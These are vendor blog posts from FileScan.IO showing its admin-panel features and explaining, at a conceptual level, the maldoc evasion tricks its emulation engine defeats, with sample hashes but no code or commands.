Tuesday, August 23, 2022

Behind the curtains: capabilities of the FileScan.IO backend

It's been way too long since we published a blogpost, but our product management and R&D team has been quite busy over the past year. Our main focus has been around hardening the analysis engine, supporting additional threat types (e.g. our newly added URL analysis capability), growing the community and building an enterprise grade product. In this short blogpost, we will start out our blog revival and showcase a few capabilities of the admin panel / backend. Something most users have not seen yet, as it is only available to admins. Duh. ;)

Accessing the admin panel

When logged in to the webservice as an admin (note: the initial admin is the first user that is setup when deploying a vanilla system), the user menu at the top right will be populated with an "Admin panel" menu item:

The landing page of the admin panel is the "Statistics" sub-page (see top menu) and will look similar to this:

The statistics pages contain a variety of data analytics on the file types seen, total number of active users, top uploaders, uploader count, etc.

The "Errors" subpage also contains a de-duplicated view (with filtering capabilities) of client errors that may be experienced by users. It is a regular go-to place that we visit to pick up on edge cases not considered, etc. Note: one of the benefits of operating a public community service is that we receive a very wide-spread range of files/URLs, continuously hardening our system with real-world data.

User Management

The user management is a typical interface, allowing to see a paginated list of users, their user account status, group name, last login date, etc. For data privacy reasons, we will not include a screenshot. However, it may be noted that there is a very configurable user group capability, which allows the admin to create any number of groups and assign permissions. Any user can be a member of a single or multiple groups and the final access permissions are determined based on the aggregate. Similar to how users work on un*x systems.

The individual group permissions (i.e. which group is allowed to access which feature) are configurable at the Settings - Feature Access subpage:

Note: as by default every user is part of the "User" group, the "Intel" user will be able to access both basic "Threat intelligence" and "Advanced intelligence" features.

API Quotas

We have a very extensive API quota settings subpage that allows setting an API quota on either a route or per group basis with very granular configuration options:

OAuth 2.0

A lesser known feature is the ability to allow authentication with the webservice using OAuth 2.0 (such as Google or Azure Active Directory):

In case this feature is enabled, a user will be able to login to the webservice either using the local account or the OAuth 2.0 service provider. Note: an interesting feature is that we allow specifying multiple OAuth providers and automatically detect & merge users with the same identifier.

Scan Sources

Another (new!) webservice feature is the "Scan sources" feature accessible from the top menu. In effect, it allows configuring a webservice to pull in files/URLs from a variety of sources. Currently, we support the configuration of IMAP accounts that are then regularly polled with a background (cron-like) job and ingested into the webservice. As this is still a work in progress, we will only show a few snippits:

However, setting up an E-Mail scan source is mostly self-explanatory and it's a fully working and implemented feature at this point, part of our next product release.

Other features that are often overlooked

URL Phishing Detection

When submitting an URL, Filescan.io will automatically determine if it's an "URL to a file" or a webpage. In case of a regular webpage, a full browser emulation is performed, including machine-learning based image analysis of a phishing attack. Here's a great example:


OpenAPI / Python CLI

An extensive API and OpenAPI (OAS3) Documentation is available from the API link at the top menu. You can generate your API key for authorization at the API Key tab of your profile settings. A convenient pip package / CLI tool is available here: https://github.com/filescanio/fsio-cli

Certificate Whitelisting and Validation

Filesan.io extracts certificates not only from PE files, but also productivity files, such as PDF or VBA macros. All extracted certificates are checked on whether they are expired, revoked or self-signed. When a certificate is issued by a trusted software vendor, the verdict for that binary artefact is set to benign automatically.

Final Words

In this blogpost, a few key areas of the admin panel and backend features were showcased, outlining the maturity of the overall product and its flexibility in terms of ACL and customization.

Do you like what you see at www.filescan.io or in this blogpost and are interested in a live technical demo, data sheets and/or quote? Please get in touch with sales via our company contact form: https://www.filescan.com/contact/sales or E-Mail sales@filescan.io

Disclaimer: all screenshots were taken from a dev staging server populated with test data. Actual commercial product UX may differ slightly.

Sunday, August 29, 2021

FileScan.IO vs. Maldoc Evasion Techniques

Today, malicious documents (so called "maldocs") are a very common initial attack vector (e.g. as part of E-Mail attachment). Over time, threat actors have improved the techniques used behind malicious office files to make indicator of compromise (IOC) extraction and general detection more difficult. Such techniques include VBA macro obfuscation, environment and geofencing checks for targeted attacks, anti-analysis tricks (e.g. big sleep / sleep loops) and implementing additional obfuscation layers (e.g. via obfuscated cmd/powershell and vbs/js scripts). Only after unwrapping and bypassing all of these layers, the actual payload / malware is downloaded from an external host. Thus far, the only solution has been to execute office files within an isolated environment (sandbox) and monitor its behavior (e.g. network connections). This requires a complex setup, is time and resource intensive.

We have taken on the challenge of implementing sophisticated emulators that can unwrap these "matryoshka"-like maldocs at a 10x speed improvement vs. traditional sandboxing solutions.

As part of our free community site launch at FileScan.IO, we want to showcase a few interesting files that contain today's anti-analysis and obfuscation techniques, as well as demonstrate the results of our engine processing those files successfully. For your pleasure, please follow the cross-referenced links in our footer section to dive even deeper into the respective techniques.

Example Techniques (Sample #1)

MD5 531364f5afadcadd83aef3158c100c98
SHA1 a2f60bc02786c316644e353578eab83f5152237c
SHA256 13c54b5e7df8b7127204be84e81d1cba1e73ec56354c6ea961a8c1acf66d0281
FileType Microsoft Word 2007+
FileScan.IO https://www.filescan.io/uploads/612bbbb477c320b029441b65/reports/f1edeb07-8b5d-46c4-a1f8-003b9173fb59/overview

The file implements the following techniques:


This technique has been described widely[1] in the industry as a method to execute malicious code upon opening the document in the targeted machine. Instead of using the classic Document_Open, or Auto_Open events, InkPicture belongs to a group of ActiveX controls that will launch VB macro code when the document is opened.

Document name checking 

Certain malware families have implemented checks that read the document name prior to execution, as often analysis systems will rename files prior analysis[2]. Thus, it is important to analyze a file in an environment as close to the "would be" environment as possible.

Recent file count

Another known anti-analysis technique implemented by maldoc authors is to check the total number of recent documents opened by Word historically[3], as a vanilla Windows installation (often used as part of a simple sandbox setup) will have no recent documents and/or very few usage artifacts in general. If the system that analyzes the malware isn't prepared properly, no malicious code will be executed.

Geofencing protection

Some malware campaigns focus on a speific region due to certain interests like geopolitics. It's common for malware campaigns[4] to implement a technique dubbed geofencing. More precisely, malware will check the region where it's being executed in (e.g. by checking the system language or network outbound IP geolocation) before downloading any payloads. As knowing the payload download location (e.g. a specific external host) is the key Indicator of Compromise that an analysis is interested in, failing to bypass such checks is extremely unfortunate. There is means of bypassing such checks in automated systems (e.g. having a list of pre-configured VPN servers to choose from, allowing to emulate a specific region). However, as often it is not known a priori, manual inspection of an initial analysis is necessary to understand what the right system configuration is needed, followed by additional analysis. A very time consuming task. Wouldn't it be nice to bypass geofencing checks the first time around in a matter of seconds?

Example Techniques (Sample #2)

MD5 09fb106744ea85876ba65dfad545bccd
SHA1 55c22b2db3a215fcb68956f75d6b24043da5fbf9
SHA256 330a560f492569d5caaf894e4f58b1b797358709a975d6b86361b5dffce3d27f
FileType Microsoft Word 2007+

Powershell obfuscation

The actual payload download is hidden behind an obfuscated powershell commandline. Typical anti-analysis techniques involve Base64 encoding, using GZIP-inflated stream of bytes, using string concatenation tricks and invoke-obfuscation.

IOCs hidden behind multiple obfuscation layers

Long sleeps

A typical anti-analysis technique that involves sleeping a long time before performing additional malicious activity. In this case, a long sleep is performed after sending a HTTP request to the payload delivery host.

Why does the analysis time matter?

Organizations need systems that can get insights (e.g. IOCs) from the attack chain of files arriving at their perimeters, as quickly as possible. Today, the attack surface has become quite broad compared to what was the case in the old economy. While we still have the traditional inbound E-Mails, we also have a wide range of cloud services, network shares, bring-your-own-device ("BYOD"), remote workers connected to poorly secured home networks, among other attacks schemes, which expose endpoints to unknown files. Therefore, it is a key challenge to being able to extract IOCs from a large quantity of incoming files quickly, as that allows instant blocking and internal scanning.

We are excited to present a solution that can beat nearly all known methods of evasion techniques used by cybercriminals in the wild to give insights into a large part of the full attack chain in less than 30 seconds*. This is possible due to our unique and sophisticated, proprietary emulation engines that are capable of analyzing VBA, Powershell, CMD, VBScript and Javascript.

FileScan.IO Analysis Report

The platform provides the user an overview of the submitted file with all the results that our engine extracted during the analysis. The summary will help the user to understand if the file is malicious or not and which signals (Our behavior signatures) matched during the analysis:

Emulation Data Results

The most interesting section of FileScan is our emulation engine. The sample mentioned at the beginning of the article contains as we exposed several techniques that combined between them convert the file ins something difficult to analyze automatically to get the final stage. When the file is executed in our platform, the system will detect the different anti-evasion techniques and beat them in order to get the full chain execution:

Our emulation engine will be able to detect and beat all the known anti-evasion techniques used and get the final payload behind this document file:

As can be seen in the screenshot above, the FileScan.IO engine was able to emulate the file and beat all the anti-evasion methods found to obtain the write event that will occur when the expected scenario occurs and the file can be executed.

Indicators of Compromise

All extracted (potential) IOCs from the input file, any emulation layer, extracted/downloaded file, etc. are aggregated and presented in a simple type-ordered overview page from the top left menu.

You can use these IOCs to quickly find related samples, perform additional threat intelligence research, update your security perimeter / firewalls and scan your corporate network for other potentially compromised endpoints.

* the average analysis time is ~15 seconds per file, but outliers remain.

References / Foot notes

Friday, July 9, 2021

Welcome to Next-Gen Malware Analysis

Hey, there! Welcome to our new research lab blog!

We're still in "stealth mode" working on the community service launch, which we hope will be ready soon. The new service we are building is a next-gen malware analysis platform that has the following emphasis:

  • Providing rapid and in-depth file analysis services capable of massive processing
  • Focus on Indicator-of-Compromise (IOC) extraction and actionable context

More information will follow soon.

To start out with a first goodie, here is a desktop background that you can use if you are as excited as we are: